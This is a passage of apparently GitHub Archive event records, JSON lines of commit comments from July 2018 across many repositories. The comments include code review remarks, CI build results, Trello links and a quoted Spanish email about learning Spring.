vas\n>    a ver sistemas de 10 años atrás y tener que hacer mantenimiento o cuando te\n>    toque \"adaptar\" cosas viejas a nuevas tecnologías y verás los cambios. Es\n>    algo super natural todo lo que dije, no te vuelvas loco jajjaa\n>\n> PD: si el eclipse no te \"recomienda nada\" escribiendo un .jsp es un tema\n> de eclipse eso...\n>\n> En cuanto a \"la magia\", no existe, es una ilusión. Al igual que la magia\n> de verdad. Lamentablemente por el tiempo que tenemos no podemos dar en\n> profundidad Spring porque es muuy grande y sería muy engorroso darlo a muy\n> bajo nivel. Pero si querés podés buscar info :D Creeme no hay mucha\n> \"magia\". Todo es código ;) Lo máximo de magia que vas a llegar son las\n> cosas en bajo nivel de java, escritas en C, etc pero bueno ya ahí empezamos\n> a trabajar a un nivel muuuy \"bajo\"... Por lo pronto toda duda \"general de\n> alto nivel\" de Spring que tengas y pueda responderte de manera correcta,\n> intentaré hacerlo!\n>\n> PD2: Otra cosa \"buena\" de spring es que hace \"de todo\"... Prácticamente\n> para lo que quieras podes usar Spring y encima está para otros\n> lenguajes/plataformas... Es un gigante, nos guste más o nos guste menos. Y\n> como tal está bueno aprenderlo. Aunque eventualmente será cambiado por otra\n> cosa que va a hacer más o menos lo mismo pero distinto. Si entendés Spring\n> después vas a poder aprender solo \"prácticamente cualquier cosa\" que haga\n> lo mismo ;)\n>\n> Espero haber aclarado aunque sea un poco :P Cualquier cosa escriban!\n> No hablé con jony pero supongo que debe pensar más o menos parecido a mi.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/carolina46/CIL-Grupo2/commit/f8c5e5dc81509bba74adf89cecce4cd775a9e424#commitcomment-29806908>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Al8ACFTEwFOT5jFnsEPNnGTS30XU1rb3ks5uJlOegaJpZM4VZxxc>\n> .\n>\n"}},"created_at":"2018-07-25T01:46:16Z"}
{"id":"8013678150","type":"CommitCommentEvent","actor":{"login":"brentadamson"},"repo":{"name":"jivesearch/jivesearch"},"payload":{"comment":{"id":29822852,"position":null,"line":null,"path":null,"commit_id":"8341048cdf3e7f4492847a54ccee64a6ed02a130","created_at":"2018-07-25T01:47:18Z","updated_at":"2018-07-25T01:47:18Z","author_association":"MEMBER","body":"#47 This will make it include a map in the Wikipedia summary box for queries such as \"New York City\", etc."}},"created_at":"2018-07-25T01:47:18Z"}
{"id":"8013679797","type":"CommitCommentEvent","actor":{"login":"grimreaper"},"repo":{"name":"macports/macports-guide"},"payload":{"comment":{"id":29822861,"position":26,"line":137,"path":"guide/xml/using.xml","commit_id":"c15987cbb65719a33378e83f9e7a0e08b832f79b","created_at":"2018-07-25T01:47:56Z","updated_at":"2018-07-25T01:47:56Z","author_association":"MEMBER","body":"Thanks for the report. I did build the guide, but forgot to validate. Fixed in 6131b82"}},"created_at":"2018-07-25T01:47:56Z"}
{"id":"8013680817","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29822863,"position":null,"line":null,"path":null,"commit_id":"c5e114ab1ad17816665ddc3e22afb2a41c68144a","created_at":"2018-07-25T01:48:18Z","updated_at":"2018-07-25T01:48:18Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-25T01:48:18Z"}
{"id":"8013683686","type":"CommitCommentEvent","actor":{"login":"beckdac"},"repo":{"name":"BeckResearchLab/thermalizer"},"payload":{"comment":{"id":29822871,"position":null,"line":null,"path":null,"commit_id":"82d6d04c5b70ba50c3b3f25d1486f3a08c02a64a","created_at":"2018-07-25T01:49:22Z","updated_at":"2018-07-25T01:49:22Z","author_association":"NONE","body":"As cool as f strings are, your fix enables python 3.x where x<6 functionality. Nice."}},"created_at":"2018-07-25T01:49:22Z"}
{"id":"8013689950","type":"CommitCommentEvent","actor":{"login":"x4m3"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29822884,"position":null,"line":null,"path":null,"commit_id":"afc81c1855bf711315b8e5de02db138d3d487eeb","created_at":"2018-07-25T01:51:32Z","updated_at":"2018-07-25T01:51:32Z","author_association":"NONE","body":"happy 8th birthday swift!"}},"created_at":"2018-07-25T01:51:32Z"}
{"id":"8013692776","type":"CommitCommentEvent","actor":{"login":"tabbek"},"repo":{"name":"DeviaVir/zenbot"},"payload":{"comment":{"id":29822892,"position":null,"line":null,"path":null,"commit_id":"e28aa61e54a0464e4a1eeeedda863aa75cc9902f","created_at":"2018-07-25T01:52:34Z","updated_at":"2018-07-25T01:52:34Z","author_association":"NONE","body":"Why was Discord removed?"}},"created_at":"2018-07-25T01:52:34Z"}
{"id":"8013692897","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29822893,"position":null,"line":null,"path":null,"commit_id":"a1cc074f5750d3cc12bc04be8cf8292bb09aff7f","created_at":"2018-07-25T01:52:37Z","updated_at":"2018-07-25T01:52:37Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - Win64-Windows-7-VisualStudio-14: OK (2946 of 2946 tests passed, 623 test warnings)\n\nMessages:\n\n * 623 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T01:52:37Z"}
{"id":"8013692953","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29822894,"position":null,"line":null,"path":null,"commit_id":"31089b8bc23e4bd98665e60884a4b91abde3914e","created_at":"2018-07-25T01:52:38Z","updated_at":"2018-07-25T01:52:38Z","author_association":"NONE","body":"Won´t this be tested at LTC?"}},"created_at":"2018-07-25T01:52:38Z"}
{"id":"8013693943","type":"CommitCommentEvent","actor":{"login":"rfigueror1"},"repo":{"name":"gg-RD/instagramHashService"},"payload":{"comment":{"id":29822897,"position":null,"line":null,"path":null,"commit_id":"bae49a0e674bd0154e111d9c20e0576c1edf8d25","created_at":"2018-07-25T01:53:00Z","updated_at":"2018-07-25T01:53:00Z","author_association":"COLLABORATOR","body":"Merged overlay "}},"created_at":"2018-07-25T01:53:00Z"}
{"id":"8013694009","type":"CommitCommentEvent","actor":{"login":"recklessop"},"repo":{"name":"recklessop/zplanner"},"payload":{"comment":{"id":29822898,"position":null,"line":null,"path":null,"commit_id":"dc14006fccb146bda289c5939d10ef443dd6a7e5","created_at":"2018-07-25T01:53:02Z","updated_at":"2018-07-25T01:53:02Z","author_association":"OWNER","body":"instead of each vm-getio thread generating its own timestamp for the database entries, now the parent script that generates the threads gets the time and outputs to a file where the child threads pick it up. This ensures that all of the entries to the database during this stats run are inserted with the same timestamp. Which simplifies database queries later on."}},"created_at":"2018-07-25T01:53:02Z"}
{"id":"8013697783","type":"CommitCommentEvent","actor":{"login":"jnothman"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":29822903,"position":56,"line":247,"path":"sklearn/decomposition/dict_learning.py","commit_id":"a52053deefb00fd15a4d9027fcddcad79bc5d83c","created_at":"2018-07-25T01:54:27Z","updated_at":"2018-07-25T01:54:27Z","author_association":"MEMBER","body":"Better to open an issue than comment on a loose commit"}},"created_at":"2018-07-25T01:54:27Z"}
{"id":"8013700697","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29822906,"position":null,"line":null,"path":null,"commit_id":"31089b8bc23e4bd98665e60884a4b91abde3914e","created_at":"2018-07-25T01:55:33Z","updated_at":"2018-07-25T01:55:33Z","author_association":"OWNER","body":"http://tests.stockfishchess.org/tests/view/5b573f250ebc5902bdb869ec\n\nAndrew Gant says it's not a simplification and it wasn't doing well so i\nstopped the tests.\n\nOn Tue, Jul 24, 2018, 7:52 PM AlexandreMasta <notifications@github.com>\nwrote:\n\n> Won´t this be tested at LTC?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/31089b8bc23e4bd98665e60884a4b91abde3914e#commitcomment-29822894>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSIOjH1jx5z3AmPobI9t9yBDIOZa9ks5uJ89mgaJpZM4VdEkm>\n> .\n>\n"}},"created_at":"2018-07-25T01:55:33Z"}
{"id":"8013705725","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29822912,"position":null,"line":null,"path":null,"commit_id":"84e145a4f4006682ced6330cfdd6e3c5f0f43717","created_at":"2018-07-25T01:57:21Z","updated_at":"2018-07-25T01:57:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Daily Check-In](https://trello.com/c/kFubNvb9/22-daily-check-in)"}},"created_at":"2018-07-25T01:57:21Z"}
{"id":"8013711686","type":"CommitCommentEvent","actor":{"login":"Hideyuki-Yamashita"},"repo":{"name":"ntt-ns/spp"},"payload":{"comment":{"id":29822920,"position":null,"line":null,"path":null,"commit_id":"9a69567e533e3b9b8668edca82924c697a0f8c30","created_at":"2018-07-25T01:59:37Z","updated_at":"2018-07-25T01:59:37Z","author_association":"CONTRIBUTOR","body":"確認しました。"}},"created_at":"2018-07-25T01:59:37Z"}
{"id":"8015441506","type":"CommitCommentEvent","actor":{"login":"meta-rahul-mittal"},"repo":{"name":"meta-vaibhav-gautam/GET2018_Assignments"},"payload":{"comment":{"id":29826717,"position":14,"line":14,"path":"Assignments/SCF_Session-5/SCF_Session-5_Q2/SearchingInArray.java","commit_id":"54d380571cc0ac6517497ee8bbd201b1379b4549","created_at":"2018-07-25T10:00:05Z","updated_at":"2018-07-25T10:00:05Z","author_association":"COLLABORATOR","body":"Don't store the param element in any local variable if you are not doing any calculation on that."}},"created_at":"2018-07-25T10:00:05Z"}
{"id":"8015441744","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826718,"position":null,"line":null,"path":null,"commit_id":"5072ef0c20fc3ec6e5acffa12697e891293fe9f6","created_at":"2018-07-25T10:00:09Z","updated_at":"2018-07-25T10:00:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredVendCatCharges](https://trello.com/c/180kQVWz/97-filteredvendcatcharges)"}},"created_at":"2018-07-25T10:00:09Z"}
{"id":"8015448494","type":"CommitCommentEvent","actor":{"login":"Conieli"},"repo":{"name":"Conieli/201807test"},"payload":{"comment":{"id":29826733,"position":null,"line":null,"path":null,"commit_id":"03639490c362f3c16eb6a60337204546a86f552a","created_at":"2018-07-25T10:01:19Z","updated_at":"2018-07-25T10:01:19Z","author_association":"OWNER","body":"追"}},"created_at":"2018-07-25T10:01:19Z"}
{"id":"8015455002","type":"CommitCommentEvent","actor":{"login":"jay602"},"repo":{"name":"kbengine/kbengine_js_plugins"},"payload":{"comment":{"id":29826745,"position":null,"line":null,"path":null,"commit_id":"c70b7572879c10dcfcb559241a8615ea749e8c0e","created_at":"2018-07-25T10:02:31Z","updated_at":"2018-07-25T10:02:31Z","author_association":"NONE","body":"增加python、PY_DICT、PY_LIST等二进制解析"}},"created_at":"2018-07-25T10:02:31Z"}
{"id":"8015457167","type":"CommitCommentEvent","actor":{"login":"oleksandrpaziuk"},"repo":{"name":"oleksandrpaziuk/odoo"},"payload":{"comment":{"id":29826750,"position":28,"line":84,"path":"addons/stock/report/report_stockpicking_operations.xml","commit_id":"f6144fe1f36ad44affff785d0e9c2c32d37a8963","created_at":"2018-07-25T10:02:56Z","updated_at":"2018-07-25T10:02:56Z","author_association":"OWNER","body":"Please check (print) report before the merge!\r\nHere you always add `<th width=\"20%\" class=\"text-center\">` but  `<t t-if=\"has_barcode\">Barcode</t>` can be emty!\r\nSame for next 3 `th` ("}},"created_at":"2018-07-25T10:02:56Z"}
{"id":"8015457918","type":"CommitCommentEvent","actor":{"login":"unpete"},"repo":{"name":"oknosoft/windowbuilder"},"payload":{"comment":{"id":29826752,"position":5,"line":1699,"path":"src/geometry/contour.js","commit_id":"8ba7581b0e49436f7ff97bef3fe2f2ccd2497af4","created_at":"2018-07-25T10:03:05Z","updated_at":"2018-07-25T10:03:05Z","author_association":"MEMBER","body":"https://github.com/oknosoft/windowbuilder/commit/1bd6c8bdeff23b74af2f7fc08b1e5074c4ee24c4"}},"created_at":"2018-07-25T10:03:05Z"}
{"id":"8015460447","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29826762,"position":12,"line":10,"path":"src/entry-client.js","commit_id":"910696ee6dc390e1b276b23b88bc9aa8dee110b5","created_at":"2018-07-25T10:03:32Z","updated_at":"2018-07-25T10:03:32Z","author_association":"OWNER","body":"客户端等待router ready之后在mount，否则 hydrate 会失败。\r\n"}},"created_at":"2018-07-25T10:03:32Z"}
{"id":"8015461932","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29826763,"position":14,"line":1645,"path":"lib/interpreters/periodic_visits.rb","commit_id":"55a2876dad35c06fbfba31ba21e102803a82d93b","created_at":"2018-07-25T10:03:48Z","updated_at":"2018-07-25T10:03:48Z","author_association":"COLLABORATOR","body":"Family is a particular naming used by a customer. Better use \"visits\""}},"created_at":"2018-07-25T10:03:48Z"}
{"id":"8015462165","type":"CommitCommentEvent","actor":{"login":"ocramz"},"repo":{"name":"gagandeepb/Frames-beam"},"payload":{"comment":{"id":29826764,"position":19,"line":19,"path":"src/FramesBeam/Streaming.hs","commit_id":"1a213e4198128582ae1383de4d224983b7fb97cf","created_at":"2018-07-25T10:03:50Z","updated_at":"2018-07-25T10:03:50Z","author_association":"NONE","body":"All these constraints can be pretty confusing to a new user; how about introducing a new typeclass to subsume at least some of them ?"}},"created_at":"2018-07-25T10:03:50Z"}
{"id":"8015463328","type":"CommitCommentEvent","actor":{"login":"jay602"},"repo":{"name":"kbengine/kbengine"},"payload":{"comment":{"id":29826768,"position":null,"line":null,"path":null,"commit_id":"87222a59c1cbc9d192752797fcf149067803c9ce","created_at":"2018-07-25T10:04:02Z","updated_at":"2018-07-25T10:04:02Z","author_association":"NONE","body":"1. 增加python、PY_DICT、PY_LIST等二进制解析\r\n2. 修复\"streamFileToClient传输0字节文件异常\"的问题"}},"created_at":"2018-07-25T10:04:02Z"}
{"id":"8015463592","type":"CommitCommentEvent","actor":{"login":"Nicofisi"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29826769,"position":44,"line":68,"path":"src/main/java/ch/njol/skript/lang/SyntaxElementInfo.java","commit_id":"b5e4385259e76245a0e5e913aadf7d41122612fc","created_at":"2018-07-25T10:04:05Z","updated_at":"2018-07-25T10:04:05Z","author_association":"CONTRIBUTOR","body":"Isn't `cast` the past form of cast? lol"}},"created_at":"2018-07-25T10:04:05Z"}
{"id":"8015467641","type":"CommitCommentEvent","actor":{"login":"hhdang6637"},"repo":{"name":"hhdang6637/embedded_linux_skeleton"},"payload":{"comment":{"id":29826775,"position":null,"line":null,"path":null,"commit_id":"b52291d0b465864e324a6c25b3dcf0e175eca2dc","created_at":"2018-07-25T10:04:53Z","updated_at":"2018-07-25T10:04:53Z","author_association":"OWNER","body":"@tranconghau , please help to test this commit with qemu  "}},"created_at":"2018-07-25T10:04:53Z"}
{"id":"8015468143","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29826777,"position":32,"line":468,"path":"wrappers/wrapper.rb","commit_id":"55a2876dad35c06fbfba31ba21e102803a82d93b","created_at":"2018-07-25T10:04:59Z","updated_at":"2018-07-25T10:04:59Z","author_association":"COLLABORATOR","body":"\"Unconsistency between visit number and minimum lapse\" instead of with"}},"created_at":"2018-07-25T10:04:59Z"}
{"id":"8015486725","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29826807,"position":22,"line":19,"path":"src/entry-server.js","commit_id":"910696ee6dc390e1b276b23b88bc9aa8dee110b5","created_at":"2018-07-25T10:08:36Z","updated_at":"2018-07-25T10:08:36Z","author_association":"OWNER","body":"服务端也是要先等待路由完成，以保证服务器输出的的index.html里的内容是由路由过的app渲染出来。\r\n\r\nin server side，resolve the app until ready ready, so that the response(index.html) content is rendered from routed app."}},"created_at":"2018-07-25T10:08:36Z"}
{"id":"8015490060","type":"CommitCommentEvent","actor":{"login":"charlesreid1"},"repo":{"name":"dcppc/lucky-penny"},"payload":{"comment":{"id":29826811,"position":13,"line":51,"path":"LuckyPenny.py","commit_id":"6027bcd907ca120c89037cf79ead29fcec97ff6c","created_at":"2018-07-25T10:09:17Z","updated_at":"2018-07-25T10:09:17Z","author_association":"MEMBER","body":"adding handleback in, as rainbow mind machine has been updated to ignore threads by default"}},"created_at":"2018-07-25T10:09:17Z"}
{"id":"8015491240","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29826815,"position":5,"line":5,"path":".babelrc","commit_id":"910696ee6dc390e1b276b23b88bc9aa8dee110b5","created_at":"2018-07-25T10:09:31Z","updated_at":"2018-07-25T10:09:31Z","author_association":"OWNER","body":"添加babel plugin来处理动态导入的语法\r\n\r\nadd babel plugin to handle dynamic import sytax "}},"created_at":"2018-07-25T10:09:31Z"}
{"id":"8015493095","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29826824,"position":9,"line":7,"path":"src/router/index.js","commit_id":"910696ee6dc390e1b276b23b88bc9aa8dee110b5","created_at":"2018-07-25T10:09:53Z","updated_at":"2018-07-25T10:09:53Z","author_association":"OWNER","body":"动态导入。\r\n\r\ndynamic import."}},"created_at":"2018-07-25T10:09:53Z"}
{"id":"8015493965","type":"CommitCommentEvent","actor":{"login":"meta-rahul-mittal"},"repo":{"name":"meta-vaibhav-gautam/GET2018_Assignments"},"payload":{"comment":{"id":29826829,"position":16,"line":16,"path":"Assignments/SCF_Session-5/SCF_Session-5_Q3/NQueensProblem.java","commit_id":"54d380571cc0ac6517497ee8bbd201b1379b4549","created_at":"2018-07-25T10:10:03Z","updated_at":"2018-07-25T10:10:03Z","author_association":"COLLABORATOR","body":"Why this method is defined as public?"}},"created_at":"2018-07-25T10:10:03Z"}
{"id":"8015495012","type":"CommitCommentEvent","actor":{"login":"honzajavorek"},"repo":{"name":"apiaryio/dredd"},"payload":{"comment":{"id":29826831,"position":46,"line":46,"path":"docs/usage-cli.md","commit_id":"7bffde7be6fcaf7c96cf114751dc5fde02b86ac4","created_at":"2018-07-25T10:10:15Z","updated_at":"2018-07-25T10:10:15Z","author_association":"MEMBER","body":"Hi @nandubatchu, see this comment: https://github.com/apiaryio/dredd/issues/215#issuecomment-258180948"}},"created_at":"2018-07-25T10:10:15Z"}
{"id":"8015495881","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29826833,"position":null,"line":null,"path":null,"commit_id":"dce09c499db59e3de3e96036f5af6c52bf4249e6","created_at":"2018-07-25T10:10:24Z","updated_at":"2018-07-25T10:10:24Z","author_association":"MEMBER","body":"@ludwigschwardt you're welcome. This makes sure it fails nicely on an assertion instead of blowing up in `(testpath/\"pgtest.png\").read` or in `(testpath/\"cpgtest.png\").read` if either of the files don't exist."}},"created_at":"2018-07-25T10:10:24Z"}
{"id":"8015497264","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29826837,"position":21,"line":18,"path":"src/entry-server.js","commit_id":"910696ee6dc390e1b276b23b88bc9aa8dee110b5","created_at":"2018-07-25T10:10:40Z","updated_at":"2018-07-25T10:10:40Z","author_association":"OWNER","body":"服务端也是要先等待路由完成，以保证服务器输出的的index.html里的内容是由路由过的app渲染出来。\r\n\r\nin server side，resolve the app until ready ready, so that the response(index.html) content is rendered from routed app."}},"created_at":"2018-07-25T10:10:40Z"}
{"id":"8015500682","type":"CommitCommentEvent","actor":{"login":"amuammarzein"},"repo":{"name":"amuammarzein/SlimWebservice"},"payload":{"comment":{"id":29826851,"position":6,"line":5,"path":"README.md","commit_id":"99584dc3ff4bff785ad0ee8ec6a8921b465f1c18","created_at":"2018-07-25T10:11:22Z","updated_at":"2018-07-25T10:11:22Z","author_association":"OWNER","body":"Ras benakno middlewere e"}},"created_at":"2018-07-25T10:11:22Z"}
{"id":"8015506470","type":"CommitCommentEvent","actor":{"login":"rbeucher"},"repo":{"name":"rbeucher/UWGeodynamics"},"payload":{"comment":{"id":29826864,"position":null,"line":null,"path":null,"commit_id":"a1749cddf3936bcf5e121b4645c0f7bf05f2065f","created_at":"2018-07-25T10:12:30Z","updated_at":"2018-07-25T10:12:30Z","author_association":"OWNER","body":"That works for relatively small deformation of the surface. It won't for your models... I have another trick coming... Small steps "}},"created_at":"2018-07-25T10:12:30Z"}
{"id":"8015507056","type":"CommitCommentEvent","actor":{"login":"amckague"},"repo":{"name":"atlassian/smith"},"payload":{"comment":{"id":29826865,"position":null,"line":null,"path":null,"commit_id":"02dc8e51b6be1dbb73d00db6dc7c920742e04ea6","created_at":"2018-07-25T10:12:36Z","updated_at":"2018-07-25T10:12:36Z","author_association":"CONTRIBUTOR","body":"Gotta go fast"}},"created_at":"2018-07-25T10:12:36Z"}
{"id":"8015507187","type":"CommitCommentEvent","actor":{"login":"ocramz"},"repo":{"name":"gagandeepb/Frames-beam"},"payload":{"comment":{"id":29826866,"position":32,"line":81,"path":"src/UsageExample.hs","commit_id":"1a213e4198128582ae1383de4d224983b7fb97cf","created_at":"2018-07-25T10:12:37Z","updated_at":"2018-07-25T10:12:37Z","author_association":"NONE","body":"These could become unit tests in LibSpec "}},"created_at":"2018-07-25T10:12:37Z"}
{"id":"8015508280","type":"CommitCommentEvent","actor":{"login":"Harbs"},"repo":{"name":"apache/royale-compiler"},"payload":{"comment":{"id":29826869,"position":null,"line":null,"path":null,"commit_id":"50310050f62d741d3ce4a4aab06e07eb9c2610bf","created_at":"2018-07-25T10:12:49Z","updated_at":"2018-07-25T10:12:49Z","author_association":"CONTRIBUTOR","body":"`IASDocComment` is missing `commentNoEnd()`\r\n\r\nI'm trying type checking..."}},"created_at":"2018-07-25T10:12:49Z"}
{"id":"8015516464","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29826891,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T10:14:25Z","updated_at":"2018-07-25T10:14:25Z","author_association":"COLLABORATOR","body":"The main problem is our workflow: \r\n1. Profile\r\n2. Exposure & WB\r\n3. Saturation (if enabled)\r\n4. Curves (if enabled - but makes picture very different!!!)\r\n5. LUT\r\n\r\nBut what we would need here is:\r\n1. Profile\r\n2. Exposure & WB\r\n3. LUT\r\n4. Saturation (if enabled)\r\n5. Curves (if enabled - but makes picture very different!!!)\r\n\r\nWhat can I do with the numbers from Andy? Someone knows where to apply them?"}},"created_at":"2018-07-25T10:14:25Z"}
{"id":"8015517053","type":"CommitCommentEvent","actor":{"login":"kamblepragati"},"repo":{"name":"kamblepragati/repo"},"payload":{"comment":{"id":29826892,"position":null,"line":null,"path":null,"commit_id":"b34eec88d392b9407cf0b0464e9f7660d5ed51ae","created_at":"2018-07-25T10:14:32Z","updated_at":"2018-07-25T10:14:32Z","author_association":"OWNER","body":"adddd"}},"created_at":"2018-07-25T10:14:32Z"}
{"id":"8015518381","type":"CommitCommentEvent","actor":{"login":"anjeylink"},"repo":{"name":"pixelant/pxa_product_manager"},"payload":{"comment":{"id":29826896,"position":9,"line":107,"path":"Classes/Domain/Model/Category.php","commit_id":"27ca1bd4fe6be16b642d2703cfcee0c1c238c51e","created_at":"2018-07-25T10:14:48Z","updated_at":"2018-07-25T10:14:48Z","author_association":"COLLABORATOR","body":"@vuxorpadd lets keep name of variable just \"taxRate\" since model already placed in product manager plugin and then just add mapping rule in \"ext_typoscript_setup.txt\" pxapm_tax_rate.mapOnProperty = taxRate"}},"created_at":"2018-07-25T10:14:48Z"}
{"id":"8015532808","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"Js41637/Overwatch-Item-Tracker"},"payload":{"comment":{"id":29826935,"position":null,"line":null,"path":null,"commit_id":"02ef3b1d5902a81519da7501777d7b9fc20b4fde","created_at":"2018-07-25T10:17:41Z","updated_at":"2018-07-25T10:17:41Z","author_association":"OWNER","body":"from pr #251 "}},"created_at":"2018-07-25T10:17:41Z"}
{"id":"8015534313","type":"CommitCommentEvent","actor":{"login":"Algunenano"},"repo":{"name":"CartoDB/Windshaft-cartodb"},"payload":{"comment":{"id":29826937,"position":5,"line":15,"path":"test/support/prepare_db.sh","commit_id":"a858d67cae0d956a882bcc25acd45d23485522a7","created_at":"2018-07-25T10:17:59Z","updated_at":"2018-07-25T10:17:59Z","author_association":"MEMBER","body":"Careful there"}},"created_at":"2018-07-25T10:17:59Z"}
{"id":"8015537860","type":"CommitCommentEvent","actor":{"login":"giuseppe-santoro"},"repo":{"name":"apuliasoft/onboarding.developers.italia.it"},"payload":{"comment":{"id":29826949,"position":54,"line":95,"path":"src/email-sent.js","commit_id":"cb05269b08bb84f3f5efdf2b63e3ae2f2807de81","created_at":"2018-07-25T10:18:41Z","updated_at":"2018-07-25T10:18:41Z","author_association":"NONE","body":"Allineare lo stile di indentazione a 2 spazi invece che 4."}},"created_at":"2018-07-25T10:18:41Z"}
{"id":"8015538349","type":"CommitCommentEvent","actor":{"login":"giuseppe-santoro"},"repo":{"name":"apuliasoft/onboarding.developers.italia.it"},"payload":{"comment":{"id":29826950,"position":77,"line":118,"path":"src/email-sent.js","commit_id":"cb05269b08bb84f3f5efdf2b63e3ae2f2807de81","created_at":"2018-07-25T10:18:47Z","updated_at":"2018-07-25T10:18:47Z","author_association":"NONE","body":"Allineare lo stile di indentazione a 2 spazi invece che 4."}},"created_at":"2018-07-25T10:18:47Z"}
{"id":"8015541920","type":"CommitCommentEvent","actor":{"login":"Lexuanduy"},"repo":{"name":"Lexuanduy/Assignment-Laravel-T1708A"},"payload":{"comment":{"id":29826957,"position":null,"line":null,"path":null,"commit_id":"344fc78903568122d95ff9d1f7d43b1dfe8da0f1","created_at":"2018-07-25T10:19:30Z","updated_at":"2018-07-25T10:19:30Z","author_association":"OWNER","body":"ABC\r\n"}},"created_at":"2018-07-25T10:19:30Z"}
{"id":"8015542211","type":"CommitCommentEvent","actor":{"login":"Lexuanduy"},"repo":{"name":"Lexuanduy/Assignment-Laravel-T1708A"},"payload":{"comment":{"id":29826958,"position":null,"line":null,"path":null,"commit_id":"344fc78903568122d95ff9d1f7d43b1dfe8da0f1","created_at":"2018-07-25T10:19:34Z","updated_at":"2018-07-25T10:19:34Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-25T10:19:34Z"}
{"id":"8015544458","type":"CommitCommentEvent","actor":{"login":"jannesep"},"repo":{"name":"getsentry/onpremise"},"payload":{"comment":{"id":29826960,"position":2,"line":17,"path":"README.md","commit_id":"4c00924afee251b9b892c81c2c323766381c8fd0","created_at":"2018-07-25T10:20:01Z","updated_at":"2018-07-25T10:20:01Z","author_association":"NONE","body":"Isn't this step now unnecessary since Docker volumes are used now rather than bind mounted directories? Of course bind mounting can still be used but the example docker-compose.yml now uses volumes."}},"created_at":"2018-07-25T10:20:01Z"}
{"id":"8015546556","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29826964,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-25T10:20:26Z","updated_at":"2018-07-25T10:20:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T10:20:26Z"}
